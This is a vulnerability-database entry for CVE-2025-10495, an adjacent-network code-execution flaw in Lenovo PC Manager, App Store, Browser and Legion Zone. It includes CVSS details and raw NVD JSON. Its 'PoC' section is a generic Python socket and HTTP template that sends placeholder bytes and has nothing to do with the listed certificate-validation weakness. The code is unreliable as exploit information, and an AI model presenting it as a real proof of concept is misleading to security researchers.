Security Vulnerability Report
CVE-2025-10495 CVSS 7.5 HIGH

CVE-2025-10495

Published: 2025-11-12 20:15:36
Last Modified: 2026-04-15 00:35:42

Description

A potential vulnerability was reported in the Lenovo PC Manager, Lenovo App Store, Lenovo Browser, and Lenovo Legion Zone client applications that, under certain conditions, could allow an attacker on the same logical network to execute arbitrary code.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

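Lenovo PC Manager (for affected versions, consult Lenovo's official security advisory)
Lenovo App Store (for affected versions, consult Lenovo's official security advisory)
Lenovo Browser (for affected versions, consult Lenovo's official security advisory)
Lenovo Legion Zone (for affected versions, consult Lenovo's official security advisory)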

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-10495 PoC - Lenovo Applications RCE via Adjacent Network
# This PoC demonstrates the network-based attack vector
# Note: For authorized security testing only
import socket

import requests


def create_malicious_payload():
    """Generate malicious payload for code execution"""
    # Example payload structure (actual payload depends on specific vulnerability)
    payload = b'\x41' * 100  # Placeholder for actual exploit
    return payload


def send_exploit(target_ip, target_port=8080):
    """Send exploit to vulnerable Lenovo application"""
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)
        s.connect((target_ip, target_port))
        payload = create_malicious_payload()
        s.send(payload)
        response = s.recv(1024)
        print(f"Received response: {response}")
        s.close()
        return True
    except Exception as e:
        print(f"Error: {e}")
        return False


def check_vulnerability(target_url):
    """Check if target Lenovo application is vulnerable"""
    try:
        # Example check - actual implementation may vary
        response = requests.get(target_url, timeout=10)
        if response.status_code == 200:
            return True
    except requests.RequestException:
        # Treat any request failure as "not confirmed"
        pass
    return False


if __name__ == "__main__":
    print("CVE-2025-10495 - Lenovo Applications RCE PoC")
    print("Target: Lenovo PC Manager, App Store, Browser, Legion Zone")
    print("Attack Vector: Adjacent Network (AV:A)")
    print("CVSS Score: 7.5 (High)")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10495", "sourceIdentifier": "[email protected]", "published": "2025-11-12T20:15:35.507", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A potential vulnerability was reported in the Lenovo PC Manager, Lenovo App Store, Lenovo Browser, and Lenovo Legion Zone client applications that, under certain conditions, could allow an attacker on the same logical network to execute arbitrary code."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", 
"vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-295"}]}], "references": [{"url": "https://iknow.lenovo.com.cn/detail/434328", "source": "[email protected]"}]}}